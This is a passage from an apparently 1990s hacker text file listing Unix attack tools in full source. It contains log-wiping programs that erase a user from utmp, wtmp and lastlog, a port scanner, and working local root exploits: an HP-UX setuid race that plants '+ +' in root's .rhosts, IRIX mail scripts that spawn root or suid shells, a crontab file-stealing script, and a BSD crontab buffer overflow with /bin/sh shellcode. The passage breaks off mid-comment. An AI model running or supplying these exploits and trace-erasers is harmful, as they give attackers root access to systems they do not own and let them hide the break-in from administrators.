  6547. char *mytty; /* For an exact match of ut_line */
  6548. char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
  6549. struct utmp *user;
  6550.  
  6551. main(argc,argv)
  6552. int argc;
  6553. char *argv[];
  6554. {
  6555.         int good= 0,cnt = 0,start = 1,cn = 0, cl = 0,index = 0;
  6556.         char err[80];
  6557.         if (argc >= 2) cn = 1;
  6558.         if (argc == 3) cl = 1;
  6559.         system(backup_utmp);
  6560.     printf("Welcome to MME 1.00 By Sir Hackalot\n");
  6561.     printf("Another PHAZESOFT Productions\n");
  6562.     printf("Status:");
  6563.     if (cn == 1) printf("Changing your login to %s\n",argv[1]);
  6564.         if (cl == 1) printf("Changing your tty   to %s\n",argv[2]);
  6565.         if (cl == 0 && cn == 0) printf("Removing you from utmp\n");
  6566.         utmpname("/etc/utmp");
  6567.  
  6568. /* The Below Section finds OUR entry, even if more than 1 of the same name
  6569.    of us is logged on.  It finds YOUR tty, looks in utmp until it finds
  6570.    your tty, then "cnt" holds your index number */
  6571.         
  6572.         mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
  6573.         strcpy(mytty,++mytty); /* Make a string starting one pos greater */
  6574.         while (good != 1) {
  6575.                 user = getutent();
  6576.                 cnt++;
  6577.                 if (strcmp(user->ut_line,mytty) == 0) good =1;
  6578.         }
  6579.         utmpname("/etc/utmp"); /* Reset file pointer */
  6580.         for(start = 0;start < cnt;start++) {
  6581.                 user = getutent(); /* Move the file pointer to where we are */
  6582.         }
  6583.  
  6584.         /* Below: If we did not supply a command line arg to change name, etc,
  6585.           make us invisible from WHO.  WHO only displays USER_PROCESS 
  6586.           types, as does "w", "whodo" and all who variations.  You WILL
  6587.           be seen if they do who -l (or one some systems -L)
  6588.           if we did supply an argument make SURE we DO show up. */
  6589.  
  6590.         if (argc == 1)  user->ut_type = LOGIN_PROCESS; /* Become invisible */
  6591.         else user->ut_type = USER_PROCESS;
  6592.  
  6593.         /* ABove: You can change it to:
  6594.          else {
  6595.          user->ut_type = LOGIN_PROCESS;
  6596.          strcpy(user->ut_name,"LOGIN");
  6597.          }
  6598.           to totally hide your-self.  On some systems, if you do it, it will go
  6599.           thru the login process... But that is rare.  AT any-rate, for 
  6600.           safety, i left out the strcpy */
  6601.  
  6602.         /* Below: If we entered a new login name, change to that.
  6603.           If we entered a new tty, change to that. */
  6604.  
  6605.         if (argc == 2) strcpy(user->ut_name,argv[1]);
  6606.         if (argc == 3) strcpy(user->ut_line,argv[2]);
  6607.         pututline(user); /* Rewrite our new info */
  6608.         endutent(); /* Tell the utmp functions we are through */
  6609.         printf("Delete /tmp/utmp.bak if all is well. Else, copy it to /etc/utmp\n");
  6610. }
  6611.  
  6612. ----------- cut here
  6613.  
  6614. .........................................................................
  6615. .                                                                       .
  6616. . 4. UNIX Port scanner                                                  .
  6617. .........................................................................
  6618.  
  6619.  
  6620. ----------- cut here
  6621.  
  6622. /* 
  6623.  * internet port scanner 
  6624.  *
  6625.  * This program will scan a hosts TCP ports printing all ports that accept
  6626.  * connections, and if known, the service name.
  6627.  * This program can be trivially altered to do UDP ports also.
  6628.  *
  6629.  * Kopywrong (K) Aug. 25, '94 pluvius@io.org
  6630.  *
  6631.  * Hey kiddies, this is a C program, to run it do this:
  6632.  * $ cc -o pscan pscan.c
  6633.  * $ pscan <host> [max port]
  6634.  *
  6635.  * No, this will not get you root.
  6636.  * 
  6637.  * Changes:
  6638.  * Changed fprintf to printf in line 34 to work with my Linux 1.1.18 box
  6639.  * Netrunner 1/18/95 11:30pm
  6640.  * 
  6641. */
  6642. static char sccsid[] = "@(#)pscan.c     1.0     (KRAD) 08/25/94";
  6643. #include <stdio.h>
  6644. #include <sys/types.h>
  6645. #include <sys/socket.h>
  6646. #include <netinet/in.h>
  6647. #include <netdb.h>
  6648.  
  6649. #define MAX_PORT 1024 /* scan up to this port */
  6650. int s;
  6651. struct sockaddr_in addr;
  6652. char rmt_host[100];
  6653.  
  6654. int skan(port)
  6655. int port;
  6656. {
  6657.  int r;
  6658.     s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  6659.     if (s < 0) {
  6660.        /* fprintf("ERROR: socket() failed\n"); */
  6661.        /* Changed to printf for my Linux 1.1.18 box */
  6662.        printf("ERROR: socket() failed\n");
  6663.        exit(0);
  6664.     }
  6665.  
  6666.     addr.sin_family = PF_INET;
  6667.     addr.sin_port = port;
  6668.     addr.sin_addr.s_addr = inet_addr(rmt_host);
  6669.  
  6670.     r = connect(s,(struct sockaddr *) &addr, sizeof(addr));
  6671.  
  6672.     close(s);
  6673.  
  6674.     if (r < 0) {
  6675.        return (1 == 0);
  6676.     }
  6677.  
  6678.     return (1 == 1);
  6679. }
  6680.  
  6681. main(argc,argv) 
  6682. int argc;
  6683. char *argv[];
  6684. {
  6685.  int a,b,c,d,e,f;
  6686.  struct hostent *foo;
  6687.  struct servent *bar;
  6688.  
  6689.    if (argc < 2) {
  6690.       fprintf(stderr,"usage: %s <host> [highest port]\n",argv[0]);
  6691.       exit(0);
  6692.    }
  6693.  
  6694.    if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
  6695.       foo = gethostbyname(argv[1]);
  6696.       if (foo == NULL) {
  6697.          fprintf(stderr,"error: cannot resolve host %s\n",argv[1]);
  6698.          exit(0);
  6699.       }
  6700.       sprintf(rmt_host,"%d.%d.%d.%d",(unsigned char )foo->h_addr_list[0][0],
  6701.               (unsigned char ) foo->h_addr_list[0][1], 
  6702.               (unsigned char ) foo->h_addr_list[0][2], 
  6703.               (unsigned char ) foo->h_addr_list[0][3]);
  6704.    } else {
  6705.       strncpy(rmt_host,argv[1],99);
  6706.    }
  6707.  
  6708.  
  6709.    if (argc > 2) {
  6710.       f = atoi(argv[2]);
  6711.    } else
  6712.       f = MAX_PORT;
  6713.  
  6714.    fprintf(stdout,"Scanning host %s - TCP ports 1 through %d\n",rmt_host,f);
  6715.  
  6716.    for (e =1;e<=f;e++) {
  6717.     char serv[100];
  6718.       if (skan(e)) {
  6719.          bar = getservbyport(e,"tcp");
  6720.          printf("%d (%s) is running.\n",e,(bar == NULL) ? "UNKNOWN" :
  6721.                 bar->s_name);
  6722.       }
  6723.    }
  6724. }
  6725.  
  6726. ------------ cut here
  6727.  
  6728. .........................................................................
  6729. .                                                                       .
  6730. .  5. Remove wtmp entries by tty number or username                     .
  6731. .........................................................................
  6732.  
  6733.  
  6734. ---------- cut here
  6735.  
  6736.  
  6737. /* This program removes wtmp entries by name or tty number */
  6738.  
  6739. #include <utmp.h>
  6740. #include <stdio.h>
  6741. #include <sys/file.h>
  6742. #include <sys/fcntlcom.h>
  6743.  
  6744. void usage(name)
  6745. char *name;
  6746. {
  6747.     printf("Usage: %s [ user | tty ]\n", name);
  6748.     exit(1);
  6749. }
  6750.  
  6751. void main (argc, argv)
  6752. int argc;
  6753. char *argv[];
  6754. {
  6755.     struct utmp utmp;
  6756.     int size, fd, lastone = 0;
  6757.     int match, tty = 0, x = 0;
  6758.  
  6759.     if (argc>3 || argc<2)
  6760.        usage(argv[0]);
  6761.  
  6762.     if (strlen(argv[1])<2) {
  6763.        printf("Error: Length of user\n");
  6764.        exit(1);
  6765.     }
  6766.  
  6767.     if (argc==3)
  6768.        if (argv[2][0] == 'l') lastone = 1;
  6769.  
  6770.     if (!strncmp(argv[1],"tty",3))
  6771.        tty++;
  6772.  
  6773.     if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
  6774.         printf("Error: Open on /usr/adm/wtmp\n");
  6775.         exit(1);
  6776.     }
  6777.  
  6778.     printf("[Searching for %s]:  ", argv[1]);
  6779.  
  6780.     if (fd >= 0)
  6781.     {
  6782.        size = read(fd, &utmp, sizeof(struct utmp));
  6783.        while ( size == sizeof(struct utmp) )
  6784.        {
  6785.           if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
  6786.             ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
  6787.               lastone != 1)
  6788.           {
  6789.              if (x==10)
  6790.                 printf("\b%d", x);
  6791.              else
  6792.              if (x>9 && x!=10)
  6793.                 printf("\b\b%d", x);
  6794.              else
  6795.                 printf("\b%d", x);
  6796.              lseek( fd, -sizeof(struct utmp), L_INCR );
  6797.              bzero( &utmp, sizeof(struct utmp) );
  6798.              write( fd, &utmp, sizeof(struct utmp) );
  6799.              x++;
  6800.           }
  6801.           size = read( fd, &utmp, sizeof(struct utmp) );
  6802.        }
  6803.     }
  6804.     if (!x)
  6805.        printf("No entries found.");
  6806.     else
  6807.        printf(" entries removed.");
  6808.     printf("\n");
  6809.     close(fd);
  6810. }
  6811.  
  6812. ------------- cut here
  6813.  
  6814. ............................................................................
  6815. .                                                                          .
  6816. .  6. SunOS wtmp editor                                                    .
  6817. ............................................................................
  6818.  
  6819.  
  6820. ---------- cut here
  6821.  
  6822. /*
  6823.    /var/adm/wtmp editor for Sun's
  6824.    Written by gab, this will make a file wtmp.tmp then just copy
  6825.    it over /var/adm/wtmp and chmod 644 it
  6826. */
  6827.  
  6828. #include <stdio.h>
  6829. #include <utmp.h>
  6830. #include <fcntl.h>
  6831. main(argc,argv)
  6832. int argc;
  6833. char *argv[];
  6834. {
  6835. int fp=-1,fd=-1;
  6836. struct utmp ut;
  6837. int i=0;
  6838. char name[8];
  6839. if (argc!=2) { fprintf(stderr,"usage: %s accountname\n\r",argv[0]);  exit(2);}
  6840. strcpy(name,argv[1]);
  6841. if (fp=open("/var/adm/wtmp",O_RDONLY)) {
  6842.         fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
  6843.         while (read(fp,&ut,sizeof(struct utmp))==sizeof(struct utmp)) {
  6844.                 if (strncmp(ut.ut_name,name,strlen(name))) write(fd,&ut,sizeof(struct utmp));
  6845.                 i++;
  6846.         }
  6847.         close(fp);
  6848.         close(fd);
  6849.         }
  6850. printf("Total: %d\n\r", i);
  6851. }
  6852. ------------ cut here
  6853.  
  6854. .......................................................................
  6855. .                                                                     .
  6856. .  7. SunOS 4+ Zap your self from wtmp, utmp and lastlog              .
  6857. .......................................................................
  6858.  
  6859.  
  6860. -------------  cut here
  6861.  
  6862. /*
  6863.       Title:  Zap.c (c) rokK Industries
  6864.    Sequence:  911204.B
  6865.  
  6866.     Syztems:  Kompiles on SunOS 4.+
  6867.        Note:  To mask yourself from lastlog and wtmp you need to be root,
  6868.               utmp is go+w on default SunOS, but is sometimes removed.
  6869.     Kompile:  cc -O Zap.c -o Zap
  6870.         Run:  Zap <Username>
  6871.  
  6872.        Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the
  6873.               entered Username. It also Zeros out the last login data for
  6874.               the specific user, fingering that user will show 'Never Logged
  6875.               In'
  6876.  
  6877.       Usage:  If you cant find a usage for this, get a brain.
  6878. */
  6879.  
  6880. #include <sys/types.h>
  6881. #include <stdio.h>
  6882. #include <unistd.h>
  6883. #include <fcntl.h>
  6884. #include <utmp.h>
  6885. #include <lastlog.h>
  6886. #include <pwd.h>
  6887.  
  6888. int f;
  6889.  
  6890. void kill_tmp(name,who)
  6891. char *name,
  6892.      *who;
  6893. {
  6894.     struct utmp utmp_ent;
  6895.  
  6896.   if ((f=open(name,O_RDWR))>=0) {
  6897.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  6898.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  6899.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  6900.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  6901.                  write (f, &utmp_ent, sizeof (utmp_ent));
  6902.             }
  6903.      close(f);
  6904.   }
  6905. }
  6906.  
  6907. void kill_lastlog(who)
  6908. char *who;
  6909. {
  6910.     struct passwd *pwd;
  6911.     struct lastlog newll;
  6912.  
  6913.      if ((pwd=getpwnam(who))!=NULL) {
  6914.  
  6915.         if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
  6916.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  6917.             bzero((char *)&newll,sizeof( newll ));
  6918.             write(f, (char *)&newll, sizeof( newll ));
  6919.             close(f);
  6920.         }
  6921.  
  6922.     } else printf("%s: ?\n",who);
  6923. }
  6924.  
  6925. main(argc,argv)
  6926. int  argc;
  6927. char *argv[];
  6928. {
  6929.     if (argc==2) {
  6930.         kill_tmp("/etc/utmp",argv[1]);
  6931.         kill_tmp("/usr/adm/wtmp",argv[1]);
  6932.         kill_lastlog(argv[1]);
  6933.         printf("Zap!\n");
  6934.     } else
  6935.     printf("Error.\n");
  6936. }
  6937. ------------ cut here
  6938.  
  6939.  
  6940. ************************************
  6941. * Appendix V - Other Unix Exploits *
  6942. ************************************
  6943.  
  6944.  
  6945.  
  6946. ..........................................................................
  6947. .                                                                        .
  6948. . 1. HP-UX Root vhe_u_mnt exploit                                        .
  6949. ..........................................................................
  6950.  
  6951.  
  6952.  
  6953. ------- cut here
  6954.  
  6955. /***
  6956.  *
  6957.  * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
  6958.  *
  6959.  * This bug is exhibited in all versions of HP-UX that contain
  6960.  * /usr/etc/vhe/vhe_u_mnt setuid to root.
  6961.  *
  6962.  * This program written by pluvius@io.org
  6963.  * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
  6964.  *
  6965.  * I found that the exploit code didn't always work due to a race between
  6966.  * the child and the parent, and that a link() called failed due to
  6967.  * the fact that user directories and the /tmp are in different file systems
  6968.  * so you must create a symlink.
  6969.  * I added in a call to alarm() so that the timing between the two processes
  6970.  * is ok..
  6971.  *
  6972.  ***/
  6973. #include <stdio.h>
  6974. #include <stdlib.h>
  6975. #include <pwd.h>
  6976. #include <string.h>
  6977. #include <unistd.h>
  6978. #include <signal.h>
  6979. #include <netdb.h>
  6980. #include <sys/wait.h>
  6981. #include <sys/stat.h>
  6982. #include <sys/utsname.h>
  6983.  
  6984. #define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
  6985. #define NAME "<defunct>"
  6986.  
  6987. int test_host()
  6988. { struct utsname name;
  6989.    uname(&name);
  6990.    return !strcmp(name.sysname,"HP-UX");
  6991. }
  6992. int check_mount()
  6993. { struct stat my_buf;
  6994.    if (stat(BUGGY_PROG, &my_buf))
  6995.       return 0;
  6996.    return !((my_buf.st_mode & S_ISUID) != S_ISUID);
  6997. }
  6998. void pause_handler()
  6999. {
  7000.    signal(SIGALRM,pause_handler);
  7001. }
  7002. int rhost_user(user)
  7003. char *user;
  7004. {
  7005.   struct passwd *info;
  7006.   char   homedir[80];
  7007.   int fd[2];
  7008.   int procno;
  7009.   struct stat my_buf;
  7010.   int fsize;
  7011.  
  7012.    info = getpwnam(user);
  7013.    if (info==NULL) {
  7014.       fprintf(stderr,"ERROR: Unknown user %s\n",user);
  7015.       exit(-3);
  7016.    }
  7017.    strcpy(homedir,info->pw_dir);
  7018.    if (homedir[strlen(homedir)-1] != '/')
  7019.       strcat(homedir,"/");
  7020.    strcat(homedir,".rhosts");
  7021.  
  7022.    signal(SIGALRM,pause_handler);
  7023.    memset(my_buf,0,sizeof(my_buf));
  7024.    stat(homedir,&my_buf);
  7025.    fsize = my_buf.st_size;
  7026.  
  7027.    /* now the exploit code... slightly modified.. but mostly from the source */
  7028.    /* by misar@rbg.informatik.th-darmstadt.de                                */
  7029.    pipe(fd);
  7030.    if (!(procno=fork())) {
  7031.       close(0);
  7032.       dup(fd[0]);
  7033.       close(fd[1]);
  7034.       close(1);
  7035.       close(2);
  7036.       alarm(2); /* wait for other process */
  7037.       nice(5);
  7038.       execl(BUGGY_PROG,NAME,NULL);
  7039.    } else {
  7040.     FILE *out;
  7041.     char listfile[25];
  7042.     char mntfile[25];
  7043.     struct stat dummy;
  7044.  
  7045.       close(1);
  7046.       dup(fd[1]);
  7047.       close(fd[0]);
  7048.       write(1,"+\n",2);
  7049.       sprintf(listfile,"/tmp/vhe_%d",procno+2);
  7050.       sprintf(mntfile,"/tmp/newmnt%d",procno+2);
  7051.       while (stat(listfile,&dummy));
  7052.       unlink(listfile);
  7053.       out=fopen(listfile,"w");
  7054.       fputs("+ +\n",out);
  7055.       fclose(out);
  7056.       unlink(mntfile);
  7057.       symlink(homedir,mntfile);
  7058.       waitpid(procno,NULL,0);
  7059.    }
  7060.    stat(homedir,&my_buf);
  7061.    return (fsize != my_buf.st_size);
  7062. }
  7063.  
  7064. void main(argc,argv)
  7065. int   argc;
  7066. char *argv[];
  7067. {
  7068.   int i;
  7069.   int rhost_root = 0;
  7070.   char userid[10];
  7071.  
  7072.    if (!test_host()) {
  7073.       fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
  7074.       exit(-1);
  7075.    }
  7076.  
  7077.    if (!check_mount()) {
  7078.       fprintf(stderr,
  7079.               "ERROR: %s must exist and be setuid root to exploit this bug\n",
  7080.               BUGGY_PROG);
  7081.       exit(-2);
  7082.    }
  7083.  
  7084.    for (i=0;(i<5)&&(!rhost_root);i++) {
  7085.       fprintf(stderr,"Attempting to .rhosts user root..");
  7086.       if (!rhost_user("root")) {
  7087.          fprintf(stderr,"failed.\n");
  7088.       } else {
  7089.          fprintf(stderr,"succeeded\n");
  7090.          rhost_root = 1;
  7091.       }
  7092.    }
  7093.  
  7094.    if (!rhost_root) {
  7095.       /* failed to rhost root, try user 'bin' */
  7096.       fprintf(stderr,"Too many failures.. trying user bin...");
  7097.       if (!rhost_user("bin")) {
  7098.          fprintf(stderr,"failed.\n");
  7099.          exit(-4);
  7100.       }
  7101.       fprintf(stderr,"succeeded.\n");
  7102.       strcpy(userid,"bin");
  7103.    } {
  7104.       strcpy(userid,"root");
  7105.    }
  7106.    fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
  7107.            userid);
  7108. }
  7109.  
  7110. --------- cut here
  7111.  
  7112. ..........................................................................
  7113. .                                                                        .
  7114. . 2. IRIX Root mail exploit                    .                         .
  7115. ..........................................................................
  7116.  
  7117.  
  7118. ---------- cut here
  7119.  
  7120. #!/bin/sh
  7121. MAIL="/bin/mail"
  7122. RM="/bin/rm -f"
  7123. CC="/usr/bin/cc"
  7124. OS="IRIX"
  7125.  
  7126. if  [ ".`uname -s`" != ".$OS" ];  then
  7127.   echo "this box is not running $OS !"
  7128.   exit 1
  7129. fi
  7130. echo "creating rewt.c"
  7131. cat >rewt.c <<'EOF'
  7132. main()
  7133. {
  7134. setuid(0);
  7135. setgid(0);
  7136. system("/bin/sh -i");
  7137. }
  7138. EOF
  7139. echo "compiling..."
  7140. $CC -o rewt rewt.c
  7141. if [ -f rewt ]; then
  7142.   echo "done"
  7143.   $RM rewt.c
  7144. else
  7145.   echo "unable to compile rewt.c"
  7146.   $RM rewt.c
  7147.   exit 1
  7148. fi
  7149. # make dummy mail file for -f
  7150. echo "making dummy mail file"
  7151. cat >dummymail <<'EOF'
  7152. From mr.haqr@bogus.host.edu Sun Oct 30 00:00:00 1994
  7153. Return-Path: </dev/null>
  7154. Message-Id: <m0r1RBj-0003gkC@bogus.host.edu>
  7155. From: mr.haqr (Mr. Haqr)
  7156. Subject: Irix is secure!!@#%$^
  7157. To: root (root)
  7158. Date: Sun, 30 Oct 1994 00:00:00
  7159.  
  7160. gimme sum rewt d00d!
  7161. <insert l0ck motd here>
  7162.  
  7163. EOF
  7164. echo "running $MAIL, type '!rewt' to get root, exit  with 'exit' and then 'q'"
  7165. $MAIL -f dummymail
  7166. echo "deleting evil files"
  7167. $RM dummymail rewt rewt.c
  7168.  
  7169. exit 0
  7170.  
  7171. ----------- cut here
  7172.  
  7173. .............................................................................
  7174. .                                                                           .
  7175. . 3. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX .
  7176. .............................................................................
  7177.  
  7178.  
  7179. [crongrab] [public release]
  7180.  
  7181. Crontab has a bug.  You run crontab -e, then you goto a shell, relink the
  7182. temp fire that crontab is having you edit, and presto, it is now your
  7183. property.  This bug has been confirmed on various versions of OSF/1, Digital
  7184. UNIX 3.x, and AIX 3.x
  7185.  
  7186. If, while running my script, you somehow manage to mangle up your whole
  7187. system, or perhaps do something stupid that will place you in jail, then
  7188. neither I, nor sirsyko, nor the other fine folks of r00t are responsible.
  7189.  
  7190. Personally, I hope my script eats your cat and causes swarms of locuses to
  7191. decend down upon you, but I am not responsible if they do.
  7192.  
  7193. --kmem.
  7194.  
  7195. [-- Script kiddies cut here -- ]
  7196. #!/bin/sh
  7197.  
  7198. # This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996
  7199. # This crappy exploit script was written by kmem.
  7200. # and remember if ur not owned by r00t, ur not worth owning
  7201. #
  7202. # usage: crongrab <file_to_grab> <destination>
  7203.  
  7204. echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others???
  7205. echo if this did not work on OSF/1 read the comments -- it is easy to fix.
  7206.  
  7207. if [ $# -ne '2' ]; then
  7208.  echo "usage: $0 <file_to_grab> <destination>"
  7209.  exit
  7210. fi
  7211.  
  7212. HI_MUDGE=$1
  7213. YUMMY=$2
  7214. export HI_MUDGE
  7215.  
  7216. UNAME=`uname`
  7217. GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1"
  7218.  
  7219. #SETUP the awk script
  7220. cat >1.awk <<END
  7221. {
  7222. new= i%2
  7223. if (new == 0) print \$0
  7224. i++
  7225. }
  7226. END
  7227.  
  7228. cat >aix.sed <<END
  7229. /^crontab:/d
  7230. /^$/d
  7231. END
  7232.  
  7233. #shell script
  7234. cat >myedit.sh <<EDITOR_END
  7235. #!/bin/ksh
  7236.  
  7237. rm \$1
  7238. ln -s \$HI_MUDGE \$1
  7239. exit
  7240. EDITOR_END
  7241.  
  7242. chmod 700 myedit.sh
  7243.  
  7244. #save old vars
  7245. oldedit=$EDITOR
  7246. oldvis=$VISUAL
  7247. VISUAL=./myedit.sh
  7248. EDITOR=./myedit.sh
  7249. export EDITOR
  7250. export VISUAL
  7251.  
  7252. #do the exploit@!&*&*(!@*(&
  7253.  
  7254. if [ $UNAME = "AIX" ]; then
  7255.  crontab -e 2>.r00t-tmp1
  7256.  sed -f aix.sed .r00t-tmp1 > $YUMMY
  7257. elif [ $UNAME =  "OSF1" ]; then
  7258.  #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines
  7259.  crontab -e 2>.r00t-tmp1
  7260.  awk -f 1.awk .r00t-tmp1 >$YUMMY
  7261.  # FOR PRE DIGITAL UNIX 3.X machines uncomment this line
  7262.  #crontab -l 2>&1 > $YUMMY
  7263. else
  7264.  echo "Sorry, dont know your OS. But you are a bright boy, read the skript and"
  7265.  echo "Figger it out."
  7266.  exit
  7267. fi
  7268.  
  7269. echo "Checkit out  - $YUMMY"
  7270. echo "sirsyko and kmem kickin it out."
  7271. echo "r00t"
  7272.  
  7273. #cleanup our mess
  7274. crontab -r
  7275. VISUAL=$oldvis
  7276. EDITOR=$oldedit
  7277. HI_MUDGE=''
  7278. YUMMY=''
  7279. export HI_MUDGE
  7280. export YUMMY
  7281. export VISUAL
  7282. export EDITOR
  7283. rm -f $GIRLIES
  7284.  
  7285. ------------- cut here
  7286.  
  7287. ............................................................................
  7288. .                                                                          .
  7289. .  4. IRIX mail exploit to make you any user on the mahine - BUT NOT root  .
  7290. ............................................................................
  7291.  
  7292.  
  7293. ----------- cut here
  7294.  
  7295. [irixmksh] [public release]
  7296.  
  7297. There are bugs in the IRIX mail proggies.  This sample script exploits them
  7298. to give you an suid shell of any user on the system, EXCEPT, for uid=0.
  7299.  
  7300. Obviously, this script should not be run if you are a clueless script kiddie
  7301. and have no clue what is going to do.  If this script causes any sort of
  7302. harm to you, physically or virtually, them members of r00t are not responsible,
  7303. and in fact will probably laugh at you.
  7304.  
  7305. r00t -- you may not like us, but your girlfriend does.
  7306.  
  7307. Script kiddies cut here
  7308. ---------------------------------------------------------------------------
  7309. #!/sbin/ksh
  7310. # usage: irixmksh <user> - creates an suid shell of any user on the system
  7311. # except for uid=0
  7312.  
  7313. FILES=qfAA12345 putq /tmp/x usr
  7314.  
  7315. if [ "x`uname -s`" != "xIRIX" ];then
  7316.   echo "this box is not running IRIX - later..."
  7317.   exit 1
  7318. fi
  7319.  
  7320. if [ "$#" != "1" ]; then
  7321.   echo "Usage: $0 <non uid=0 user>"
  7322.   exit 1
  7323. fi
  7324.  
  7325. TargetUser=$1
  7326.  
  7327. # Make the mail queue files
  7328. cat <<_r00t-text_>qfAA12345
  7329. P0
  7330. T830896940
  7331. DdfAA12345
  7332. Bblah
  7333. Mdeferred: just cuz...
  7334. C$TargetUser
  7335. Sroot
  7336. R<"|/tmp/x">
  7337. H?P?return-path: <root>
  7338. H?D?date: Tue, 30 Feb 1996 12:34:56 -0400
  7339. H?F?from: root (root)
  7340. Hreceived: by hackerz.dom (HackerOS/UCB 5.64/Hackerz Domain
  7341.         id AA12345 for root@hackerz.com; Tue, 30 Feb 1996 12:34:56 -0400
  7342. H?M?message-id: <9602301234.AA12345@localhost>
  7343. Happarently-to: root@plato.coolcode.com
  7344. _r00t-text_
  7345.  
  7346.  
  7347. # Make the script to run with euid=mail
  7348. cat<<_r00t-text_>putq
  7349. #!/bin/sh
  7350. cp qfAA12345 /usr/spool/mqueue
  7351. touch /usr/spool/mqueue/dfAA12345
  7352. chown root /usr/spool/mqueue/*5
  7353. _r00t-text_
  7354. chmod u+x putq
  7355.  
  7356. # Make the script to create the suid shell
  7357. cat<<_r00t-text_>/tmp/x
  7358. #!/bin/sh
  7359. cp /bin/sh /tmp/b00sh.$TargetUser
  7360. chmod 6777 /tmp/b00sh.$TargetUser
  7361. _r00t-text_
  7362. chmod u+x /tmp/x
  7363. chown $TargetUser /tmp/x
  7364.  
  7365. # Make the script to grab suid mail shell
  7366. cat<<_r00t-text_>usr
  7367. #!/bin/sh
  7368. chgrp mail b00sh-mail
  7369. chmod 2777 b00sh-mail
  7370. _r00t-text_
  7371. chmod u+x usr
  7372.  
  7373. # Now snag mail access and send the queue files.
  7374. cp /bin/sh b00sh-mail
  7375. export PATH=.:$PATH
  7376. export IFS=/
  7377. echo "blah" | rmail $LOGNAME
  7378. export IFS=
  7379.  
  7380. b00sh-mail putq
  7381. mailq
  7382.  
  7383. # Clean Up:
  7384. rm $FILES
  7385. -------------------------------- cut here
  7386.  
  7387. 5. The Root BSD crontab exploit
  7388.  
  7389. ---------------- cut here
  7390.  
  7391. /*
  7392. ** BSDI/FreeBSD exploit for crontab
  7393. **
  7394. ** For BSDi (Tested in 2.1) the default offset should be OK
  7395. ** For FreeBSD, the offset seems to be around 1000
  7396. **
  7397. ** I didn't find this hole, I only exploited it.
  7398. **
  7399. ** Brian Mitchell brian@saturn.net
  7400. */
  7401.  
  7402. #include <stdio.h>
  7403. #include <sys/types.h>
  7404. #include <stdlib.h>
  7405. #include <fcntl.h>
  7406. #include <unistd.h>
  7407.  
  7408. #define DEFAULT_OFFSET          -1050
  7409. #define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
  7410. #define HAPPY_FILE              "./Window"
  7411.  
  7412. long get_esp(void)
  7413. {
  7414.    __asm__("movl %esp,%eax\n");
  7415. }
  7416.  
  7417. main(int argc, char **argv)
  7418. {
  7419.    int fd;
  7420.    char *buff = NULL;
  7421.    unsigned long *addr_ptr = NULL;
  7422.    char *ptr = NULL;
  7423.    
  7424.    char execshell[] =
  7425.    "\xeb\x23"
  7426.    "\x5e"
  7427.    "\x8d\x1e"
  7428.    "\x89\x5e\x0b"
  7429.    "\x31\xd2"
  7430.    "\x89\x56\x07"
  7431.    "\x89\x56\x0f"
  7432.    "\x89\x56\x14"
  7433.    "\x88\x56\x19"
  7434.    "\x31\xc0"
  7435.    "\xb0\x3b"
  7436.    "\x8d\x4e\x0b"
  7437.    "\x89\xca"
  7438.    "\x52"
  7439.    "\x51"
  7440.    "\x53"
  7441.    "\x50"
  7442.    "\xeb\x18"
  7443.    "\xe8\xd8\xff\xff\xff"
  7444.    "/bin/sh"
  7445.    "\x01\x01\x01\x01"
  7446.    "\x02\x02\x02\x02"
  7447.    "\x03\x03\x03\x03"
  7448.    "\x9a\x04\x04\x04\x04\x07\x04";
  7449.    
  7450.  
  7451.   
  7452. /*
  7453.  * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
  7454.  * a '=' character appears below
  7455.  */
  7456.  
  7457.    
  7458.    int i;
  7459.    int ofs = DEFAULT_OFFSET;
  7460.  
  7461.    /* if we have a argument, use it as offset, else use default */
  7462.    if(argc == 2)
  7463.       ofs = atoi(argv[1]);   
  7464.    else if (argc > 2) {
  7465.       fprintf(stderr, "egg [offset]\n");
  7466.       exit(-1);
  7467.    }
  7468.    /* print the offset in use */
  7469.    printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
  7470.    
  7471.    buff = malloc(4096);
  7472.    if(!buff)
  7473.    {
  7474.       printf("can't allocate memory\n");
  7475.       exit(0);
  7476.    }
  7477.    ptr = buff;
  7478.    /* fill start of buffer with nops */
  7479.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  7480.    ptr += BUFFER_SIZE-strlen(execshell);
  7481.    /* stick asm code into the buffer */
  7482.    for(i=0;i < strlen(execshell);i++) 
  7483.       *(ptr++) = execshell[i];
  7484.    
  7485.    addr_ptr = (unsigned long *)ptr;
  7486.    for(i=0;i < (878/4);i++)
  7487.       *(addr_ptr++) = get_esp() + ofs;
  7488.    ptr = (char *)addr_ptr;
  7489.    *ptr++ = '=';
  7490.    *ptr++ = 'X';
  7491.    *ptr++ = '\n';
  7492.    *ptr = 0;
  7493.    printf("Writing to %s\n", HAPPY_FILE);
  7494.  
  7495. /*
  7496.  * The sleep is required because as soon as crontab opens the tmp file it
